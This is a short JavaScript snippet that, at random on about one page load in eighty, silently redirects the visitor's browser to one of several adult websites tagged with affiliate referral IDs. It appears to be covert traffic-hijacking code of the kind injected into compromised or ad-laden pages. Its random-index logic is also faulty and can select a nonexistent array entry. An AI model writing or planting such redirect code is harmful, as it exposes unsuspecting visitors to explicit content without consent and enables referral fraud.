n = 0;
m = 80;
r = Math.floor(Math.random()*(n-m+1))+m;

var myUrls=new Array();
myUrls[0] = "http://www.nakedrugirls.com/?sid=7383"; 
myUrls[1] = "http://strip-mamba.com/?rid=2811"; 
myUrls[2] = "http://soderganka.ws/?rid=2811"; 
myUrls[3] = "http://strip-mamba.com/?rid=2811"; 
myUrls[4] = "http://www.allruserotika.com/?sid=7383"; 
start = -1;
stop = 5;

if(r == 1)
	{
		randomUrl = Math.floor(Math.random()*(start-stop+1))+stop;
		document.location.href=myUrls[randomUrl];
	}
